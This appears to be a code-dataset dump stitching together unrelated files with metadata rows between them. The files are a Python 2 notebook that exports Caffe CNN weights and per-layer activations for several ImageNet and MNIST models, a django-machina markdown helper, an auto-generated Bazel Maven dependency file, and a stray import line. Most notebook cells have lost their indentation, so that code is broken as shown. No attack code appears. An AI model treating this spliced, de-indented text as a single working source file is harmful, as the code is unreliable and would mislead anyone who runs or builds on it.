    #print name
# In[55]:
# Load CaffeNet, run one forward pass, and dump every blob's activations
# to one text file per layer; finally print the weight/bias shapes.
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import caffe
caffe_root = '../'  # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + 'models/bvlc_reference_caffenet/deploy.prototxt'
model_weights = caffe_root + 'models/bvlc_reference_caffenet/bvlc_reference_caffenet.caffemodel'

### load net model
net = caffe.Net(model_def,      # defines the structure of the model
                model_weights,  # contains the trained weights
                caffe.TEST)     # use test mode (e.g., don't perform dropout)

### mean image
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + 'python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1)  # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)

### input image
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1))      # move image channels to outermost dimension
transformer.set_mean('data', mu)                # subtract the dataset-mean value in each channel
transformer.set_raw_scale('data', 255)          # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0))   # swap channels from RGB to BGR

### set gpu
caffe.set_device(0)  # if we have multiple GPUs, pick the first one
caffe.set_mode_gpu()
net.forward()

### output shape of layer >>> output.txt
# for each layer, write "<name> <shape>" then the flattened activations.
for layer_name, blob in net.blobs.iteritems():
    f1 = open('/home/liguangli/split_net/caffenet/layer_output/' + layer_name + '.txt', 'w')
    print layer_name + '\t' + str(blob.data.shape)
    f1.write(layer_name + ' ' + str(blob.data.shape) + '\n')
    for element in blob.data.flat:
        #for element in np.nonzero(blob.data):
        f1.write(str(element) + " ")
    f1.write('\n')
    f1.close()

### param shape of layer >>> param_shape.txt
for layer_name, param in net.params.iteritems():
    print layer_name + '\t' + str(param[0].data.shape), str(param[1].data.shape)
# In[15]:
# Display only the first MNIST test record (same decode as the earlier
# inspection cell, without the two-image counter).
import sys
import numpy as np
import lmdb
import caffe
import argparse
from matplotlib import pyplot

lmdbpath = '/home/liguangli/work/caffe/examples/mnist/mnist_test_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
with env.begin() as txn:
    cursor = txn.cursor()
    for key, value in cursor:
        print 'key: ',key
        datum = caffe.proto.caffe_pb2.Datum()  # Datum protobuf message
        datum.ParseFromString(value)  # parse the raw LMDB value into it
        flat_x = np.fromstring(datum.data, dtype=np.uint8)  # to numpy array
        x = flat_x.reshape(datum.channels, datum.height, datum.width)
        y = datum.label  # image label
        print flat_x.shape
        print type(flat_x)
        x2 = flat_x.reshape((28,28))
        print y
        fig = pyplot.figure()  # show the decoded digit
        pyplot.imshow(x2, cmap = plt.cm.gray)
        break
# In[58]:
####### mnist-lenet
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + 'examples/mnist/lenet_batch1.prototxt'
model_weights = caffe_root + 'examples/mnist/lenet_iter_10000.caffemodel'
outputdir = '/home/liguangli/split_net/lenet'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
# 1000 images forward
lmdbpath = '/home/liguangli/work/caffe/examples/mnist/mnist_test_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
#print 'key: ',key
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
y = datum.label #图片的label
net.blobs['data'].data[...] = x
output = net.forward()
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
if n % 100 == 0:
print "{0}/1000".format(n)
n = n + 1
if n > 1000 :
break
# In[255]:
###imagenet-alexnet
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/bvlc_alexnet/deploy_batch1.prototxt'
model_weights = caffe_root + '/models/bvlc_alexnet/bvlc_alexnet.caffemodel'
outputdir = '/home/liguangli/split_net/alexnet'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
print "output create done"
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
transformed_image = transformer.preprocess('data', xx)
#image = caffe.io.load_image(caffe_root + '/examples/images/cat.jpg')
#transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#print "done"
if n % 10 == 0:
print "{0}/100".format(n)
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
n = n + 1
if n > 100:
break
# In[259]:
###imagenet-googlenet
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/bvlc_googlenet/deploy_batch1.prototxt'
model_weights = caffe_root + '/models/bvlc_googlenet/bvlc_googlenet.caffemodel'
outputdir = '/home/liguangli/split_net/googlenet'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name.replace('/', '_') + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name.replace('/', '_') + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
print "output create done"
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
transformed_image = transformer.preprocess('data', xx)
#image = caffe.io.load_image(caffe_root + '/examples/images/cat.jpg')
#transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#print "done"
if n % 10 == 0:
print "{0}/100".format(n)
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
n = n + 1
if n > 100:
break
# In[261]:
###imagenet-vgg16
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/vgg16/VGG_ILSVRC_16_layers_deploy.prototxt'
model_weights = caffe_root + '/models/vgg16/VGG_ILSVRC_16_layers.caffemodel'
outputdir = '/home/liguangli/split_net/vgg16'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name.replace('/', '_') + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name.replace('/', '_') + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
print "output create done"
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
transformed_image = transformer.preprocess('data', xx)
#image = caffe.io.load_image(caffe_root + '/examples/images/cat.jpg')
#transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#print "done"
if n % 10 == 0:
print "{0}/100".format(n)
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
n = n + 1
if n > 100:
break
# In[262]:
###imagenet-resnet-18
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/resnet-18/test_batch1.prototxt'
model_weights = caffe_root + '/models/resnet-18/resnet-18.caffemodel'
outputdir = '/home/liguangli/split_net/resnet-18'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name.replace('/', '_') + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name.replace('/', '_') + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
print "output create done"
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
transformed_image = transformer.preprocess('data', xx)
#image = caffe.io.load_image(caffe_root + '/examples/images/cat.jpg')
#transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#print "done"
if n % 10 == 0:
print "{0}/100".format(n)
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
n = n + 1
if n > 100:
break
# In[233]:
###imagenet-test
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/bvlc_alexnet/deploy_batch1.prototxt'
model_weights = caffe_root + '/models/bvlc_alexnet/bvlc_alexnet.caffemodel'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name + '\t' + str(param[0].data.shape)
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
print y
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
pyplot.imshow(xx)
transformed_image = transformer.preprocess('data', xx)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
output_prob = output['prob'][0] # the output probability vector for the first image in the batch
print 'predicted class is:', output_prob.argmax()
# load ImageNet labels
labels_file = caffe_root + '/data/ilsvrc12/synset_words.txt'
if not os.path.exists(labels_file):
get_ipython().system(u'../data/ilsvrc12/get_ilsvrc_aux.sh')
labels = np.loadtxt(labels_file, str, delimiter='\t')
print 'output label:', labels[output_prob.argmax()]
n = n + 1
if n > 1:
break
# In[263]:
n = 1
for layer_name, blob in net.blobs.iteritems():
print str(n) + " " + layer_name + str(blob.data.shape)
if n == 1:
print max(blob.data.flat)
print min(blob.data.flat)
pyplot.hist(blob.data.flat,100)
n = n + 1
# In[ ]:
| 31.97037 | 124 | 0.654966 | 3,701 | 25,896 | 4.481491 | 0.071602 | 0.032015 | 0.015194 | 0.01447 | 0.934041 | 0.928916 | 0.90492 | 0.896358 | 0.885626 | 0.877909 | 0 | 0.025704 | 0.208256 | 25,896 | 809 | 125 | 32.009889 | 0.783251 | 0.224938 | 0 | 0.917137 | 0 | 0 | 0.147444 | 0.085644 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.141243 | null | null | 0.086629 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1c0d5fa0ac57596646e81ed65681848227c1925a | 178 | py | Python | machina/core/markdown.py | danielmcquillen/django-machina | 08aa3a58a7889b0d5a5bcd6c24965c524762c7a6 | [
"BSD-3-Clause"
] | null | null | null | machina/core/markdown.py | danielmcquillen/django-machina | 08aa3a58a7889b0d5a5bcd6c24965c524762c7a6 | [
"BSD-3-Clause"
] | 2 | 2021-06-02T00:29:11.000Z | 2021-09-01T23:02:30.000Z | machina/core/markdown.py | danielmcquillen/django-machina | 08aa3a58a7889b0d5a5bcd6c24965c524762c7a6 | [
"BSD-3-Clause"
] | null | null | null | from django.utils.encoding import smart_text
from markdown2 import markdown as _markdown
def markdown(text, **kwargs):
    """Render *text* with markdown2 and return it as stripped text.

    Extra keyword arguments are forwarded unchanged to ``markdown2.markdown``;
    the rendered HTML is whitespace-stripped and coerced via ``smart_text``.
    """
    rendered = _markdown(text, **kwargs)
    return smart_text(rendered.strip())
| 25.428571 | 56 | 0.775281 | 24 | 178 | 5.583333 | 0.583333 | 0.134328 | 0.268657 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00641 | 0.123596 | 178 | 6 | 57 | 29.666667 | 0.852564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
1c4d9c9f499de0cb780d4716ab1e1f51f13a7239 | 12,424 | bzl | Python | examples/third_party/aether/requires.bzl | pubref/rules_require | 75250be1187dd610bb085af459b312d0af83043b | [
"Apache-2.0"
] | null | null | null | examples/third_party/aether/requires.bzl | pubref/rules_require | 75250be1187dd610bb085af459b312d0af83043b | [
"Apache-2.0"
] | 1 | 2017-04-04T17:06:51.000Z | 2017-04-05T07:17:13.000Z | examples/third_party/aether/requires.bzl | pubref/rules_require | 75250be1187dd610bb085af459b312d0af83043b | [
"Apache-2.0"
] | null | null | null | # Auto-generated by org.pubref.tools.gradle.GenRequires, do not edit:
load('@org_pubref_rules_require//require:rules.bzl',
_require = 'require')
# Maven coordinates for every workspace dependency, keyed by Bazel repo name.
DEPS = {
    'org_codehaus_plexus_plexus_utils': {
        'kind': 'maven_jar',
        'artifact': 'org.codehaus.plexus:plexus-utils:jar:3.0.22',
    },
    'org_apache_maven_maven_model_builder': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.maven:maven-model-builder:jar:3.3.9',
    },
    'org_slf4j_slf4j_api': {
        'kind': 'maven_jar',
        'artifact': 'org.slf4j:slf4j-api:jar:1.6.2',
    },
    'org_apache_maven_maven_builder_support': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.maven:maven-builder-support:jar:3.3.9',
    },
    'org_eclipse_aether_aether_transport_http': {
        'kind': 'maven_jar',
        'artifact': 'org.eclipse.aether:aether-transport-http:jar:1.1.0',
    },
    'org_apache_httpcomponents_httpcore': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.httpcomponents:httpcore:jar:4.3.2',
    },
    'org_eclipse_aether_aether_util': {
        'kind': 'maven_jar',
        'artifact': 'org.eclipse.aether:aether-util:jar:1.1.0',
    },
    'org_eclipse_aether_aether_connector_basic': {
        'kind': 'maven_jar',
        'artifact': 'org.eclipse.aether:aether-connector-basic:jar:1.1.0',
    },
    'org_slf4j_jcl_over_slf4j': {
        'kind': 'maven_jar',
        'artifact': 'org.slf4j:jcl-over-slf4j:jar:1.6.2',
    },
    'org_eclipse_aether_aether_spi': {
        'kind': 'maven_jar',
        'artifact': 'org.eclipse.aether:aether-spi:jar:1.1.0',
    },
    'commons_codec_commons_codec': {
        'kind': 'maven_jar',
        'artifact': 'commons-codec:commons-codec:jar:1.6',
    },
    'org_apache_maven_maven_repository_metadata': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.maven:maven-repository-metadata:jar:3.3.9',
    },
    'org_apache_httpcomponents_httpclient': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.httpcomponents:httpclient:jar:4.3.5',
    },
    'org_apache_maven_maven_aether_provider': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.maven:maven-aether-provider:jar:3.3.9',
    },
    'org_apache_maven_maven_model': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.maven:maven-model:jar:3.3.9',
    },
    'org_apache_maven_maven_artifact': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.maven:maven-artifact:jar:3.3.9',
    },
    'org_apache_commons_commons_lang3': {
        'kind': 'maven_jar',
        'artifact': 'org.apache.commons:commons-lang3:jar:3.4',
    },
    'org_eclipse_aether_aether_transport_file': {
        'kind': 'maven_jar',
        'artifact': 'org.eclipse.aether:aether-transport-file:jar:1.1.0',
    },
    'com_google_guava_guava': {
        'kind': 'maven_jar',
        'artifact': 'com.google.guava:guava:jar:18.0',
    },
    'org_eclipse_aether_aether_api': {
        'kind': 'maven_jar',
        'artifact': 'org.eclipse.aether:aether-api:jar:1.1.0',
    },
    'org_codehaus_plexus_plexus_interpolation': {
        'kind': 'maven_jar',
        'artifact': 'org.codehaus.plexus:plexus-interpolation:jar:1.21',
    },
    'org_codehaus_plexus_plexus_component_annotations': {
        'kind': 'maven_jar',
        'artifact': 'org.codehaus.plexus:plexus-component-annotations:jar:1.6',
    },
    'org_eclipse_aether_aether_impl': {
        'kind': 'maven_jar',
        'artifact': 'org.eclipse.aether:aether-impl:jar:1.1.0',
    },
}

# Every Gradle configuration below except `archives` resolves the identical
# dependency closure, so the name list (in DEPS declaration order) is written
# once and copied per call.
_FULL_CLOSURE = [
    'org_codehaus_plexus_plexus_utils',
    'org_apache_maven_maven_model_builder',
    'org_slf4j_slf4j_api',
    'org_apache_maven_maven_builder_support',
    'org_eclipse_aether_aether_transport_http',
    'org_apache_httpcomponents_httpcore',
    'org_eclipse_aether_aether_util',
    'org_eclipse_aether_aether_connector_basic',
    'org_slf4j_jcl_over_slf4j',
    'org_eclipse_aether_aether_spi',
    'commons_codec_commons_codec',
    'org_apache_maven_maven_repository_metadata',
    'org_apache_httpcomponents_httpclient',
    'org_apache_maven_maven_aether_provider',
    'org_apache_maven_maven_model',
    'org_apache_maven_maven_artifact',
    'org_apache_commons_commons_lang3',
    'org_eclipse_aether_aether_transport_file',
    'com_google_guava_guava',
    'org_eclipse_aether_aether_api',
    'org_codehaus_plexus_plexus_interpolation',
    'org_codehaus_plexus_plexus_component_annotations',
    'org_eclipse_aether_aether_impl',
]

def _require_full_closure(deps):
    # A fresh list copy is passed on every call so `_require` never sees a
    # shared mutable list.
    _require(list(_FULL_CLOSURE), deps = deps)

def compileClasspath(deps = DEPS):
    _require_full_closure(deps)

def compileOnly(deps = DEPS):
    _require_full_closure(deps)

def testCompile(deps = DEPS):
    _require_full_closure(deps)

def testCompileClasspath(deps = DEPS):
    _require_full_closure(deps)

def archives(deps = DEPS):
    # The archives configuration carries no dependencies.
    _require([], deps = deps)

def default(deps = DEPS):
    _require_full_closure(deps)

def testCompileOnly(deps = DEPS):
    _require_full_closure(deps)

def compile(deps = DEPS):
    _require_full_closure(deps)

def runtime(deps = DEPS):
    _require_full_closure(deps)

def testRuntime(deps = DEPS):
    _require_full_closure(deps)
| 35.907514 | 75 | 0.760625 | 1,569 | 12,424 | 5.393881 | 0.049713 | 0.105282 | 0.145575 | 0.200165 | 0.937256 | 0.89909 | 0.837883 | 0.827721 | 0.763323 | 0.740872 | 0 | 0.011306 | 0.131439 | 12,424 | 345 | 76 | 36.011594 | 0.772959 | 0.005393 | 0 | 0.750751 | 1 | 0 | 0.743262 | 0.688223 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03003 | false | 0 | 0 | 0 | 0.03003 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
1c7753f511490504911854f3ff431629cd281d02 | 7,079 | py | Python | src/dataGenerator.py | AhmedAldahshoury/BringlsICR | 00cb14d923226814ddd4e9f2ebb184097228ec22 | [
"MIT"
] | null | null | null | src/dataGenerator.py | AhmedAldahshoury/BringlsICR | 00cb14d923226814ddd4e9f2ebb184097228ec22 | [
"MIT"
] | 6 | 2021-06-08T22:31:19.000Z | 2022-03-12T00:48:52.000Z | src/dataGenerator.py | AhmedAldahshoury/BringlsICR | 00cb14d923226814ddd4e9f2ebb184097228ec22 | [
"MIT"
] | 1 | 2021-04-28T17:37:10.000Z | 2021-04-28T17:37:10.000Z | import os, sys, subprocess
